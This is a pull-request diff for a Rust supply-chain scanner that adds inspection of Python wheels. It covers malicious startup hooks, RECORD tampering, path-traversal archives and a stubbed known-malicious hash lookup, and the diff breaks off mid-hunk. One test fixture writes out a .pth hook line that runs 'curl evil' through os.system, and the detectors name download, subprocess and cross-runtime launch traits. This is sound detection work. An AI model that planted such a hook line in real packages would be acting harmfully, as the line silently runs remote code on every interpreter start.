### PR TITLE
B8: wire artifact inspection into scan and package inspect, with artifact-set cross-distribution correlation

### DIFF
--- a/Cargo.lock
+++ b/Cargo.lock
@@ -3050,6 +3050,7 @@ dependencies = [
  "url",
  "uuid",
  "walkdir",
+ "zip",
 ]
 
 [[package]]

--- a/crates/tirith-core/Cargo.toml
+++ b/crates/tirith-core/Cargo.toml
@@ -11,6 +11,20 @@ readme = "../../README.md"
 keywords = ["security", "url", "analysis"]
 categories = ["development-tools"]
 
+[features]
+# Off-by-default seam for artifact / member SHA-256 known-malicious lookups
+# against the threat DB. The DB methods it calls (`check_artifact_sha256` /
+# `check_file_sha256`) are the DB-B deliverable and DO NOT EXIST YET, so this
+# milestone keeps the feature OFF and the emission behind a reserved seam that
+# computes its indicator from a stub returning `false` (see
+# `artifact::correlate::artifact_hash_indicator`). When DB-B lands, the stub body
+# is replaced with the real lookup; the `ArtifactKnownMalicious` RuleId is already
+# registered (so the registry tests see it) and the CLI flips this feature on.
+# Building with `--features artifact-hash-lookup` compiles and tests cleanly
+# today; it just never fires until the DB methods exist.
+default = []
+artifact-hash-lookup = []
+
 [dependencies]
 url = { workspace = true }
 regex = { workspace = true }

--- a/crates/tirith-core/assets/data/rule_explanations.toml
+++ b/crates/tirith-core/assets/data/rule_explanations.toml
@@ -2782,3 +2782,15 @@ examples_good = ["a NumPy-shaped .so that exports PyInit__core and only does num
 false_positive_guidance = "An ordinary compiled extension has an execution entry (every Python extension has PyInit_*) but does not reach a danger capability or carry corroboration, so it does not fire. The conjunction is deliberately strict to keep NumPy, SciPy, and other legitimate native wheels clean. A partial triage of an above-cap member can still establish the chain from the available evidence; if a legitimate in-house extension genuinely needs a flagged capability, allowlist the owning distribution rather than weakening the detector."
 remediation = "Treat a native import-execution chain as an incident. Identify the distribution that ships the module and the payload it hands off to, isolate the environment, and rotate any credentials reachable from it. Reinstall affected distributions from a trusted source after confirming the upstream artifact is clean, and prefer wheels whose native members carry no embedded runtime launch or credential-path reference."
 mitre_id = "T1129"
+
+[[rule]]
+id = "artifact_known_malicious"
+title = "An inspected artifact or member matches a known-malicious hash"
+category = "ecosystem"
+severity_rationale = "Critical, mapping to block: a wheel, sdist, or one of its members whose SHA-256 is on the threat database's known-malicious list is a confirmed supply-chain artifact, not a heuristic, so it blocks outright."
+description = "Emitted by artifact inspection only when the off-by-default artifact-hash-lookup cargo feature is enabled and the threat database resolves the artifact's or a member's SHA-256 to a known-malicious record. The hash-lookup database methods are a later deliverable, so this rule is unreachable in the shipped default build: it is registered for completeness and its emission lives behind a reserved feature seam that is wired to the real lookup once the database support lands. Until then no input can trigger it, so it has no tier-1 pattern entry and is in EXTERNALLY_TRIGGERED_RULES."
+examples_bad = ["a downloaded wheel whose whole-file SHA-256 matches a published malicious-package record", "a wheel that bundles a member .so whose SHA-256 is a known-malicious indicator"]
+examples_good = ["a wheel whose hash and member hashes match no known-malicious record", "an artifact inspected with the hash-lookup feature off, where the lookup never runs"]
+false_positive_guidance = "A known-malicious hash match is exact, so a false positive means the database itself is wrong; report a mistaken record to the feed maintainer rather than suppressing the rule."
+remediation = "Do not install or run the artifact. Remove it from caches and mirrors, identify how it entered the supply chain, and rotate any credentials that may have been exposed to it. Pull the dependency only from a trusted source after confirming a clean hash."
+mitre_id = "T1195"

--- a/crates/tirith-core/assets/data/rule_explanations.toml
+++ b/crates/tirith-core/assets/data/rule_explanations.toml
@@ -2794,3 +2794,13 @@ examples_good = ["a wheel whose hash and member hashes match no known-malicious 
 false_positive_guidance = "A known-malicious hash match is exact, so a false positive means the database itself is wrong; report a mistaken record to the feed maintainer rather than suppressing the rule."
 remediation = "Do not install or run the artifact. Remove it from caches and mirrors, identify how it entered the supply chain, and rotate any credentials that may have been exposed to it. Pull the dependency only from a trusted source after confirming a clean hash."
 mitre_id = "T1195"
+
+[[rule]]
+id = "wheel_structurally_rejected"
+title = "A wheel was structurally rejected by the hardened archive reader"
+category = "ecosystem"
+severity_rationale = "High, mapping to block: the hardened wheel reader rejects an archive for a hard structural fault - a path-traversal member name, an encrypted member, a CRC mismatch, or a duplicate-path collision - any of which means the artifact cannot be safely trusted or installed. These faults do not occur in well-formed wheels from a trusted build, so a rejection is a strong tamper or attack signal rather than a benign packaging quirk."
+description = "Synthesized by `tirith package inspect` (not by the engine over a string fixture, so it has no PATTERN_TABLE entry and is in EXTERNALLY_TRIGGERED_RULES) whenever the hardened archive reader marks a member structurally rejected. The reader rejects a member whose name escapes the archive root via `..` or an absolute path (a path-traversal install primitive), an encrypted member whose bytes cannot be inspected, a member whose decompressed bytes fail their stored CRC (tampering), and two members that collide on the same normalized path (a shadowing primitive). Because these faults produce no B5/B6/B7 signal on their own, the rejection is surfaced as this finding carrying the reader's violation detail strings, so a consumer that gates on the findings list - not only the action or exit code - still sees the block."
+false_positive_guidance = "A wheel built by a normal toolchain from a trusted source does not contain a path-traversal member, an encrypted member, a CRC mismatch, or a duplicate path, so a rejection is not expected for legitimate artifacts. If an in-house build legitimately trips one of these (rare), fix the build rather than allowlisting it; a path-traversal or duplicate-path member should never ship."
+remediation = "Do not install or extract the wheel. Treat it as tampered or malicious: identify how it entered the supply chain, remove it from caches and mirrors, and pull the dependency only from a trusted source after confirming a clean, well-formed artifact."
+mitre_id = "T1195"

--- a/crates/tirith-core/build.rs
+++ b/crates/tirith-core/build.rs
@@ -1273,6 +1273,9 @@ const EXPECTED_RULES: &[(&str, &str)] = &[
         "native_import_execution_chain",
         "NativeImportExecutionChain",
     ),
+    // B8 + DB-D artifact/member known-malicious hash match (feature-gated,
+    // externally triggered; unreachable until the hash-lookup feature + DB land).
+    ("artifact_known_malicious", "ArtifactKnownMalicious"),
 ];
 
 const VALID_CATEGORIES: &[&str] = &[

--- a/crates/tirith-core/build.rs
+++ b/crates/tirith-core/build.rs
@@ -1276,6 +1276,9 @@ const EXPECTED_RULES: &[(&str, &str)] = &[
     // B8 + DB-D artifact/member known-malicious hash match (feature-gated,
     // externally triggered; unreachable until the hash-lookup feature + DB land).
     ("artifact_known_malicious", "ArtifactKnownMalicious"),
+    // B8 wheel structurally rejected by the hardened reader (path traversal, encrypted
+    // member, CRC mismatch, duplicate-path collision); synthesized by `package inspect`.
+    ("wheel_structurally_rejected", "WheelStructurallyRejected"),
 ];
 
 const VALID_CATEGORIES: &[&str] = &[

--- a/crates/tirith-core/src/artifact/archive.rs
+++ b/crates/tirith-core/src/artifact/archive.rs
@@ -260,12 +260,27 @@ impl NativeMemberHandoff {
     }
 }
 
-/// A sink the reader calls as it streams members, so a caller (B7) can consume
-/// native handoffs without the reader knowing how the bytes are parsed. The
-/// default no-op impl lets A4's own tests and a metadata-only caller ignore them.
+/// A sink the reader calls as it streams members, so a caller (B7/B8) can consume
+/// member bytes without the reader knowing how they are parsed. Both methods
+/// default to a no-op so A4's own tests and a metadata-only caller ignore them.
 pub trait MemberVisitor {
     /// Called once per native member with its handoff (buffered or streaming).
     fn on_native_member(&mut self, _handoff: NativeMemberHandoff) {}
+
+    /// Called once per SMALL TEXT member that streamed `Complete` within budget and
+    /// is one of the kinds B5/B6 analyze (a `.pth`/`.start` startup file, a
+    /// `sitecustomize.py`/`usercustomize.py`, or a `.dist-info/RECORD`). The reader
+    /// already enforced every budget before this fires, so the bytes are bounded.
+    /// B8's inspection populator uses this to run the startup-hook body analysis and
+    /// the wheel-RECORD verification WITHOUT re-opening the archive. `kind` is the
+    /// member's [`ArtifactFileKind`] so the consumer can dispatch without re-sniffing.
+    fn on_text_member(
+        &mut self,
+        _location: &SubjectLocation,
+        _kind: ArtifactFileKind,
+        _bytes: &[u8],
+    ) {
+    }
 }
 
 /// A visitor that records every native handoff, for tests and for a caller that
@@ -553,6 +568,15 @@ pub fn read_wheel<R: Read + Seek>(
                     if let Some(id) = parse_metadata_identity(&member_label, &bytes) {
                         metadata_identity = Some(id);
                     }
+                }
+
+                // B8: hand small, security-relevant TEXT members (a startup hook or
+                // the dist-info RECORD) to the visitor's text sink for B5/B6 body
+                // analysis, before any move of `bytes`. Native members go to the
+                // native sink instead. Everything else is already accounted for in
+                // `inspection.files`.
+                if is_text_member_of_interest(kind, &member_label) {
+                    visitor.on_text_member(&location, kind, &bytes);
                 }
 
                 // Native member: hand the buffered bytes to B7.
@@ -977,6 +1001,25 @@ fn classify_member(member: &str) -> ArtifactFileKind {
         return ArtifactFileKind::Script;
     }
     ArtifactFileKind::Other
+}
+
+/// Whether a member is a small TEXT member B5/B6 want the bytes of: a startup hook
+/// (`.pth`/`.start`/`sitecustomize.py`/`usercustomize.py`) for B6 body analysis, or
+/// the `.dist-info/RECORD` for B5 wheel-RECORD verification. A `DistInfoMetadata`
+/// member is handed over ONLY when it is the RECORD file (not every metadata file),
+/// so the visitor is not flooded with METADATA/WHEEL/entry_points bytes it does not
+/// need.
+fn is_text_member_of_interest(kind: ArtifactFileKind, member: &str) -> bool {
+    match kind {
+        ArtifactFileKind::PthFile
+        | ArtifactFileKind::StartFile
+        | ArtifactFileKind::SiteCustomize => true,
+        ArtifactFileKind::DistInfoMetadata => {
+            let base = member.rsplit('/').next().unwrap_or(member);
+            matches!(base, "RECORD" | "RECORD.jws" | "RECORD.p7s")
+        }
+        _ => false,
+    }
 }
 
 /// The result of streaming one member's bytes under the budgets. EVERY variant

--- a/crates/tirith-core/src/artifact/correlate.rs
+++ b/crates/tirith-core/src/artifact/correlate.rs
@@ -1,0 +1,548 @@
+//! Correlate an artifact inspection's granular signals and execution edges into
+//! the user-facing findings (PR B8).
+//!
+//! The installed-tree path (`ecosystem scan --installed`) already correlates the
+//! same `crate::artifact::ArtifactSignalKind`s into the same RuleIds via methods
+//! on `crate::ecosystem_scan::InstalledIntegrityReport`. This module is the
+//! ARTIFACT (wheel/sdist) counterpart: it correlates over an
+//! [`crate::artifact::ArtifactInspection`]'s `signals` / `execution_edges`
+//! (populated by [`crate::artifact::inspect`] from the A4 wheel reader plus the
+//! B5/B6/B7 analyzers) and over an [`ArtifactSetInspection`] for cross-distribution
+//! detection. It reuses the EXISTING RuleIds (cross-cutting invariant 1: few
+//! user-facing findings, detail carried as signals), never inventing new ones for
+//! the cross-artifact context.
+//!
+//! The conjunction shape mirrors the installed path deliberately, so a `.pth` that
+//! is suspicious in a wheel and the same `.pth` once installed produce the same
+//! finding:
+//!
+//! * [`crate::verdict::RuleId::PythonStartupHookSuspicious`] (High) needs an
+//!   executing, non-template startup line paired with a danger capability.
+//! * [`crate::verdict::RuleId::PythonStartupHookCrossRuntime`] (Critical) fires
+//!   when a startup hook launches a foreign runtime (a cross-runtime execution
+//!   edge).
+//! * [`crate::verdict::RuleId::PythonInstalledIntegrityViolation`] (Medium, or
+//!   High with corroboration) covers the RECORD / ownership signals.
+//! * [`crate::verdict::RuleId::NativeImportExecutionChain`] (Critical) is produced
+//!   per native member by B7 triage and folded in directly.
+//! * [`crate::verdict::RuleId::ArtifactKnownMalicious`] (Critical) is the
+//!   DB-gated, feature-gated hash match (see [`artifact_hash_indicator`]).
+
+use std::collections::BTreeSet;
+
+use crate::artifact::{
+    ArtifactInspection, ArtifactSignal, ArtifactSignalKind, ExecutionEdge, ExecutionTrigger,
+};
+use crate::location::SubjectLocation;
+use crate::threatdb::ThreatDb;
+use crate::verdict::{Evidence, Finding, RuleId, Severity};
+
+/// Correlate one artifact inspection's signals/edges into user-facing findings.
+///
+/// `extra_native_findings` are the per-member Critical
+/// [`RuleId::NativeImportExecutionChain`] findings B7 triage produced while the
+/// archive reader streamed native members (they are decided per member, not from
+/// the inspection's signal set, so the inspection populator passes them through).
+///
+/// `threat_db` is threaded for the DB-gated [`RuleId::ArtifactKnownMalicious`]
+/// hash match; it is consulted only behind the `artifact-hash-lookup` feature.
+pub fn correlate_inspection_findings(
+    inspection: &ArtifactInspection,
+    extra_native_findings: &[Finding],
+    threat_db: Option<&ThreatDb>,
+) -> Vec<Finding> {
+    let mut findings: Vec<Finding> = Vec::new();
+
+    // Startup-hook correlation (B6) over the inspection's signals + edges.
+    findings.extend(startup_findings(
+        &inspection.signals,
+        &inspection.execution_edges,
+    ));
+
+    // Installed-integrity-style correlation (B5): the RECORD / ownership signals
+    // present on an artifact inspection (an unlisted/hash-mismatched member). For
+    // a single wheel the corroborator is an unowned/unlisted EXECUTABLE member,
+    // which `UnlistedInstalledFile` at High confidence already encodes.
+    findings.extend(integrity_findings(&inspection.signals));
+
+    // Native chains (B7): the per-member Critical findings, folded in as-is.
+    findings.extend(extra_native_findings.iter().cloned());
+
+    // DB-gated known-malicious hash match (B8 + DB-D), feature-gated.
+    findings.extend(known_malicious_findings(inspection, threat_db));
+
+    findings
+}
+
+/// The B6 startup-hook correlation over a signal slice plus the execution edges
+/// (for the cross-runtime detail). Mirrors
+/// `InstalledIntegrityReport::startup_correlated_findings` so a wheel and an
+/// installed tree agree.
+fn startup_findings(signals: &[ArtifactSignal], edges: &[ExecutionEdge]) -> Vec<Finding> {
+    let startup_signals: Vec<&ArtifactSignal> = signals
+        .iter()
+        .filter(|s| is_startup_signal_kind(s.kind))
+        .collect();
+    if startup_signals.is_empty() {
+        return Vec::new();
+    }
+
+    let mut findings: Vec<Finding> = Vec::new();
+    let kinds: BTreeSet<ArtifactSignalKind> = startup_signals.iter().map(|s| s.kind).collect();
+    use ArtifactSignalKind as K;
+
+    let has_executing_line = kinds.contains(&K::PthExecutableLine);
+    let has_danger = kinds.contains(&K::PthSubprocessSpawn)
+        || kinds.contains(&K::PthNetworkDownload)
+        || kinds.contains(&K::PthSysPathSearch)
+        || kinds.contains(&K::StartupHookObfuscated)
+        || kinds.contains(&K::PthUntrustedPathAddition);
+
+    if has_executing_line && has_danger {
+        let kind_list = distinct_kind_strings(startup_signals.iter().map(|s| s.kind));
+        let mut evidence: Vec<Evidence> = vec![Evidence::Text {
+            detail: format!("correlated startup-hook signals: {}", kind_list.join(", ")),
+        }];
+        // Name the offending member location(s) (B8f: a member-qualified
+        // `foo.whl!/member`) plus the concrete offending lines.
+        for loc in distinct_locations(startup_signals.iter().map(|s| &s.location)) {
+            evidence.push(Evidence::Text {
+                detail: format!("location: {loc}"),
+            });
+        }
+        for s in &startup_signals {
+            if matches!(s.kind, K::PthExecutableLine | K::PthUntrustedPathAddition) {
+                evidence.push(Evidence::Text {
+                    detail: s.evidence.clone(),
+                });
+            }
+        }
+        findings.push(Finding {
+            rule_id: RuleId::PythonStartupHookSuspicious,
+            severity: Severity::High,
+            title: "A Python startup hook executes suspicious code at interpreter start"
+                .to_string(),
+            description: "An artifact bundles a startup hook (a .pth import line, a Python 3.15 \
+                 .start entry-point file, or a sitecustomize.py/usercustomize.py) that executes \
+                 suspicious code at every interpreter start once installed. The body pairs an \
+                 executing, non-template line with a danger capability (a subprocess spawn, a \
+                 network download, a sys.path search, obfuscated content, or an untrusted path \
+                 addition). Canonical editable-install and namespace-package bootstraps are exempt \
+                 because their complete line matches a known template. Do not install the artifact \
+                 until the hook is reviewed."
+                .to_string(),
+            evidence,
+            human_view: None,
+            agent_view: None,
+            mitre_id: Some("T1546".to_string()),
+            custom_rule_id: None,
+        });
+    }
+
+    // Cross-runtime: a startup-triggered cross-runtime execution edge.
+    let cross_runtime_edges: Vec<&ExecutionEdge> = edges
+        .iter()
+        .filter(|e| {
+            matches!(e.trigger, ExecutionTrigger::CrossRuntimeInvocation)
+                && is_startup_trigger_origin(e)
+        })
+        .collect();
+    if !cross_runtime_edges.is_empty() {
+        let mut evidence: Vec<Evidence> = vec![Evidence::Text {
+            detail: "a startup hook launches a different language runtime (Bun/Node/Deno) at \
+                     interpreter start"
+                .to_string(),
+        }];
+        for edge in &cross_runtime_edges {
+            evidence.push(Evidence::Text {
+                detail: format!("{} -> {} ({})", edge.from, edge.to, edge.mechanism),
+            });
+        }
+        findings.push(Finding {
+            rule_id: RuleId::PythonStartupHookCrossRuntime,
+            severity: Severity::Critical,
+            title: "A Python startup hook launches a different language runtime".to_string(),
+            description: "An artifact bundles a Python startup hook that launches a separate \
+                 language runtime (Bun, Node, or Deno) at interpreter start. This is the \
+                 cross-distribution loader/payload split used by the live supply-chain campaign, \
+                 where a Python .pth hands execution to a bundled JavaScript payload. The detection \
+                 keys on the launched runtime name, not the payload filename, so renaming the \
+                 script does not evade it. Treat this as an incident: do not install the artifact, \
+                 and rotate any credentials reachable from the environment it targets."
+                .to_string(),
+            evidence,
+            human_view: None,
+            agent_view: None,
+            mitre_id: Some("T1546".to_string()),
+            custom_rule_id: None,
+        });
+    }
+
+    findings
+}
+
+/// The B5 integrity correlation over a wheel inspection's signals: a RECORD hash
+/// mismatch, a missing RECORD file, an unlisted member, or a duplicate-owned path.
+/// Medium by default; High when corroborated by an unlisted EXECUTABLE member (the
+/// `UnlistedInstalledFile` signal at High confidence, which the wheel-RECORD
+/// verifier emits for an unlisted native module / script).
+fn integrity_findings(signals: &[ArtifactSignal]) -> Vec<Finding> {
+    use ArtifactSignalKind as K;
+    let integrity_signals: Vec<&ArtifactSignal> = signals
+        .iter()
+        .filter(|s| is_integrity_signal_kind(s.kind))
+        .collect();
+    if integrity_signals.is_empty() {
+        return Vec::new();
+    }
+
+    // Corroboration: a HIGH-confidence unlisted-file signal (an unlisted executable
+    // member) or a hash mismatch elevates Medium to High.
+    let corroborated = integrity_signals.iter().any(|s| {
+        matches!(s.kind, K::UnlistedInstalledFile | K::RecordHashMismatch)
+            && s.confidence == crate::artifact::EdgeConfidence::High
+    });
+    let severity = if corroborated {
+        Severity::High
+    } else {
+        Severity::Medium
+    };
+
+    let kind_list = distinct_kind_strings(integrity_signals.iter().map(|s| s.kind));
+    let mut evidence: Vec<Evidence> = vec![Evidence::Text {
+        detail: format!(
+            "correlated artifact integrity signals: {}",
+            kind_list.join(", ")
+        ),
+    }];
+    // Name each offending member location (B8f) plus the per-signal detail.
+    for loc in distinct_locations(integrity_signals.iter().map(|s| &s.location)) {
+        evidence.push(Evidence::Text {
+            detail: format!("location: {loc}"),
+        });
+    }
+    for s in &integrity_signals {
+        evidence.push(Evidence::Text {
+            detail: s.evidence.clone(),
+        });
+    }
+
+    vec![Finding {
+        rule_id: RuleId::PythonInstalledIntegrityViolation,
+        severity,
+        title: "An artifact's RECORD does not honestly account for its contents".to_string(),
+        description: "The wheel's RECORD integrity does not hold: an unlisted member, a member \
+             whose recorded hash does not match its bytes, or a path claimed by more than one \
+             distribution. A freshly built wheel should account for every member with a strong \
+             matching hash, so this is corroboration of tampering. It is Medium by default and \
+             rises with a high-confidence corroborator such as an unlisted executable member; a \
+             strict integrity policy can upgrade the action to Block via action_overrides."
+            .to_string(),
+        evidence,
+        human_view: None,
+        agent_view: None,
+        mitre_id: None,
+        custom_rule_id: None,
+    }]
+}
+
+/// The DB-gated, FEATURE-GATED known-malicious hash correlation. Emits a Critical
+/// [`RuleId::ArtifactKnownMalicious`] when the artifact's whole-file hash or any
+/// member's hash matches a known-malicious record. See [`artifact_hash_indicator`]
+/// for why this is a reserved no-op in the shipped default build.
+fn known_malicious_findings(
+    inspection: &ArtifactInspection,
+    threat_db: Option<&ThreatDb>,
+) -> Vec<Finding> {
+    let Some(hit) = artifact_hash_indicator(inspection, threat_db) else {
+        return Vec::new();
+    };
+    vec![Finding {
+        rule_id: RuleId::ArtifactKnownMalicious,
+        severity: Severity::Critical,
+        title: "An inspected artifact or member matches a known-malicious hash".to_string(),
+        description: "The threat database resolved this artifact's hash (or a bundled member's \
+             hash) to a known-malicious record. This is a confirmed supply-chain artifact, not a \
+             heuristic. Do not install or run it; remove it from caches and mirrors and rotate any \
+             credentials that may have been exposed."
+            .to_string(),
+        evidence: vec![Evidence::Text { detail: hit }],
+        human_view: None,
+        agent_view: None,
+        mitre_id: Some("T1195".to_string()),
+        custom_rule_id: None,
+    }]
+}
+
+/// The DB-gated known-malicious hash indicator for an inspection.
+///
+/// B8g cross-track seam. The threat-DB methods this WOULD call
+/// (`ThreatDb::check_artifact_sha256` / `check_file_sha256`) are the DB-B
+/// deliverable and DO NOT EXIST YET. Per the plan, this milestone does NOT
+/// reference them (even behind the cfg), so the function compiles and tests
+/// cleanly BOTH with the feature off (the default) AND with
+/// `--features artifact-hash-lookup` on. It returns `None` (no match) in both
+/// builds today; the only difference the feature makes is that the call site is
+/// retained. When DB-B lands, the body below (under the cfg) is replaced with the
+/// real lookup over `inspection.subject`'s hash and each `inspection.files[].sha256`,
+/// and `ArtifactKnownMalicious` becomes reachable. Until then it is unreachable,
+/// which is why the RuleId is in `EXTERNALLY_TRIGGERED_RULES` with no fixture.
+#[cfg(feature = "artifact-hash-lookup")]
+fn artifact_hash_indicator(
+    inspection: &ArtifactInspection,
+    threat_db: Option<&ThreatDb>,
+) -> Option<String> {
+    // Touch the inputs so enabling the feature does not introduce unused warnings,
+    // while NOT calling the not-yet-existing DB methods.
+    let _ = (inspection, threat_db);
+    // TODO(DB-B): wire `threat_db?.check_artifact_sha256(&subject_hash)` and
+    // `check_file_sha256(&file.sha256)` here and return the matching record's
+    // wire string. Until those methods land (DB-B deliverable), this seam reports
+    // no match so the build is self-contained and `ArtifactKnownMalicious` stays
+    // unreachable. Wired in the post-DB-B integration.
+    None
+}
+
+/// The DB-gated known-malicious hash indicator — DEFAULT build (feature off). The
+/// lookup is compiled out entirely, so the artifact path never consults the DB for
+/// a hash match and [`RuleId::ArtifactKnownMalicious`] is unreachable.
+#[cfg(not(feature = "artifact-hash-lookup"))]
+fn artifact_hash_indicator(
+    _inspection: &ArtifactInspection,
+    _threat_db: Option<&ThreatDb>,
+) -> Option<String> {
+    None
+}
+
+/// Whether a signal kind is a B6 startup-hook execution signal.
+fn is_startup_signal_kind(kind: ArtifactSignalKind) -> bool {
+    use ArtifactSignalKind as K;
+    matches!(
+        kind,
+        K::PthExecutableLine
+            | K::PthNetworkDownload
+            | K::PthSubprocessSpawn
+            | K::PthSysPathSearch
+            | K::PthUntrustedPathAddition
+            | K::StartupHookObfuscated
+    )
+}
+
+/// Whether a signal kind is a B5 RECORD / ownership integrity signal.
+fn is_integrity_signal_kind(kind: ArtifactSignalKind) -> bool {
+    use ArtifactSignalKind as K;
+    matches!(
+        kind,
+        K::RecordHashMismatch
+            | K::RecordMissingFile
+            | K::UnlistedInstalledFile
+            | K::DuplicateOwnedFile
+            | K::SitecustomizeUnowned
+            | K::EditableInstallUnverified
+    )
+}
+
+/// Whether a cross-runtime execution edge originates from a startup-hook trigger
+/// (vs a native-module init), so the cross-runtime finding is attributed to the
+/// startup path. A `default()`-targeted edge whose `from` is a `.pth`/`.start`/
+/// sitecustomize member qualifies; we accept any edge whose `from` member looks
+/// like a startup hook OR whose trigger is a startup trigger recorded on a
+/// sibling signal. Conservative: an edge with no startup provenance is left to the
+/// native correlation.
+fn is_startup_trigger_origin(edge: &ExecutionEdge) -> bool {
+    // The startup analyzer records cross-runtime edges with a startup-hook `from`
+    // location (a `.pth`/`.start`/sitecustomize member). Match on the member path
+    // suffix so a rename of the payload does not matter (we key on the LOADER kind).
+    let from = edge
+        .from
+        .member_path
+        .as_deref()
+        .or_else(|| edge.from.installed_path.as_deref().and_then(|p| p.to_str()));
+    match from {
+        Some(p) => {
+            let lower = p.to_ascii_lowercase();
+            lower.ends_with(".pth")
+                || lower.ends_with(".start")
+                || lower.ends_with("sitecustomize.py")
+                || lower.ends_with("usercustomize.py")
+        }
+        // No location to attribute: the startup analyzer emits cross-runtime edges
+        // with the hook `from` set, so an edge with no `from` is not a startup one.
+        None => false,
+    }
+}
+
+/// The distinct signal-kind wire strings (snake_case), sorted, for evidence.
+fn distinct_kind_strings(kinds: impl Iterator<Item = ArtifactSignalKind>) -> Vec<String> {
+    let mut out: BTreeSet<String> = BTreeSet::new();
+    for k in kinds {
+        if let Ok(serde_json::Value::String(s)) = serde_json::to_value(k) {
+            out.insert(s);
+        }
+    }
+    out.into_iter().collect()
+}
+
+/// The distinct rendered signal locations (`foo.whl!/member`), in first-seen order
+/// and deduplicated, so a correlated finding NAMES the offending member(s) (B8f)
+/// without repeating one location per signal.
+fn distinct_locations<'a>(locations: impl Iterator<Item = &'a SubjectLocation>) -> Vec<String> {
+    let mut seen: BTreeSet<String> = BTreeSet::new();
+    let mut out: Vec<String> = Vec::new();
+    for loc in locations {
+        let s = loc.to_string();
+        if s != "<unknown>" && seen.insert(s.clone()) {
+            out.push(s);
+        }
+    }
+    out
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use crate::artifact::{
+        ArtifactIdentity, ArtifactInspection, EdgeConfidence, InspectionSubject,
+    };
+    use crate::location::SubjectLocation;
+    use crate::threatdb::Ecosystem;
+
+    fn wheel_inspection(filename: &str) -> ArtifactInspection {
+        ArtifactInspection::new(InspectionSubject::Artifact(ArtifactIdentity {
+            ecosystem: Ecosystem::PyPI,
+            name: "demo".to_string(),
+            version: Some("1.0".to_string()),
+            filename: filename.to_string(),
+            sha256: "a".repeat(64),
+        }))
+    }
+
+    #[test]
+    fn no_signals_yields_no_findings() {
+        let inspection = wheel_inspection("demo-1.0-py3-none-any.whl");
+        let findings = correlate_inspection_findings(&inspection, &[], None);
+        assert!(findings.is_empty());
+    }
+
+    #[test]
+    fn executing_line_plus_danger_fires_suspicious() {
+        let mut inspection = wheel_inspection("demo-1.0-py3-none-any.whl");
+        let loc = SubjectLocation::member("demo-1.0-py3-none-any.whl", "demo/boot.pth");
+        inspection.signals.push(ArtifactSignal {
+            kind: ArtifactSignalKind::PthExecutableLine,
+            location: loc.clone(),
+            evidence: "import os; os.system('curl evil')".to_string(),
+            confidence: EdgeConfidence::High,
+        });
+        inspection.signals.push(ArtifactSignal {
+            kind: ArtifactSignalKind::PthSubprocessSpawn,
+            location: loc,
+            evidence: "os.system".to_string(),
+            confidence: EdgeConfidence::High,
+        });
+        let findings = correlate_inspection_findings(&inspection, &[], None);
+        assert!(findings
+            .iter()
+            .any(|f| f.rule_id == RuleId::PythonStartupHookSuspicious
+                && f.severity == Severity::High));
+    }
+
+    #[test]
+    fn untrusted_path_alone_does_not_fire_suspicious() {
+        // A non-executing path-add alone is not promoted to a Block.
+        let mut inspection = wheel_inspection("demo-1.0-py3-none-any.whl");
+        inspection.signals.push(ArtifactSignal {
+            kind: ArtifactSignalKind::PthUntrustedPathAddition,
+            location: SubjectLocation::member("demo-1.0-py3-none-any.whl", "demo/boot.pth"),
+            evidence: "adds /tmp/x".to_string(),
+            confidence: EdgeConfidence::Medium,
+        });
+        let findings = correlate_inspection_findings(&inspection, &[], None);
+        assert!(findings.is_empty());
+    }
+
+    #[test]
+    fn cross_runtime_startup_edge_fires_critical() {
+        let mut inspection = wheel_inspection("demo-1.0-py3-none-any.whl");
+        let from = SubjectLocation::member("demo-1.0-py3-none-any.whl", "demo/boot.pth");
+        // A startup signal must be present (the correlation gates on the signal set
+        // being non-empty), plus the cross-runtime edge.
+        inspection.signals.push(ArtifactSignal {
+            kind: ArtifactSignalKind::PthExecutableLine,
+            location: from.clone(),
+            evidence: "import demo._bootstrap".to_string(),
+            confidence: EdgeConfidence::High,
+        });
+        inspection.execution_edges.push(ExecutionEdge {
+            from,
+            trigger: ExecutionTrigger::CrossRuntimeInvocation,
+            to: SubjectLocation::default(),
+            mechanism: "launches bun".to_string(),
+            confidence: EdgeConfidence::High,
+        });
+        let findings = correlate_inspection_findings(&inspection, &[], None);
+        assert!(findings
+            .iter()
+            .any(|f| f.rule_id == RuleId::PythonStartupHookCrossRuntime
+                && f.severity == Severity::Critical));
+    }
+
+    #[test]
+    fn unlisted_executable_member_fires_integrity_high() {
+        let mut inspection = wheel_inspection("demo-1.0-cp311-cp311-linux_x86_64.whl");
+        inspection.signals.push(ArtifactSignal {
+            kind: ArtifactSignalKind::UnlistedInstalledFile,
+            location: SubjectLocation::member(
+                "demo-1.0-cp311-cp311-linux_x86_64.whl",
+                "demo/_speedups.abi3.so",
+            ),
+            evidence: "wheel member '_speedups.abi3.so' is not listed in RECORD".to_string(),
+            confidence: EdgeConfidence::High,
+        });
+        let findings = correlate_inspection_findings(&inspection, &[], None);
+        let f = findings
+            .iter()
+            .find(|f| f.rule_id == RuleId::PythonInstalledIntegrityViolation)
+            .expect("integrity finding");
+        assert_eq!(f.severity, Severity::High);
+    }
+
+    #[test]
+    fn native_findings_are_folded_in() {
+        let inspection = wheel_inspection("demo-1.0-cp311-cp311-linux_x86_64.whl");
+        let native = Finding {
+            rule_id: RuleId::NativeImportExecutionChain,
+            severity: Severity::Critical,
+            title: "native chain".to_string(),
+            description: "x".to_string(),
+            evidence: vec![],
+            human_view: None,
+            agent_view: None,
+            mitre_id: None,
+            custom_rule_id: None,
+        };
+        let findings =
+            correlate_inspection_findings(&inspection, std::slice::from_ref(&native), None);
+        assert!(findings
+            .iter()
+            .any(|f| f.rule_id == RuleId::NativeImportExecutionChain));
+    }
+
+    #[test]
+    fn known_malicious_unreachable_without_db_methods() {
+        // The hash-lookup seam returns None in BOTH builds today (the DB methods do
+        // not exist yet), so no ArtifactKnownMalicious finding is produced even with
+        // a populated inspection.
+        let mut inspection = wheel_inspection("demo-1.0-py3-none-any.whl");
+        inspection.files.push(crate::artifact::ArtifactFile {
+            location: SubjectLocation::member("demo-1.0-py3-none-any.whl", "demo/__init__.py"),
+            size: 10,
+            sha256: "b".repeat(64),
+            kind: crate::artifact::ArtifactFileKind::PythonSource,
+        });
+        let findings = correlate_inspection_findings(&inspection, &[], None);
+        assert!(findings
+            .iter()
+            .all(|f| f.rule_id != RuleId::ArtifactKnownMalicious));
+    }
+}

--- a/crates/tirith-core/src/artifact/inspect.rs
+++ b/crates/tirith-core/src/artifact/inspect.rs
@@ -343,10 +343,11 @@ fn inspect_wheel<R: std::io::Read + std::io::Seek>(
     }
 
     // B7: triage each native handoff. The artifact path has no ownership index (a
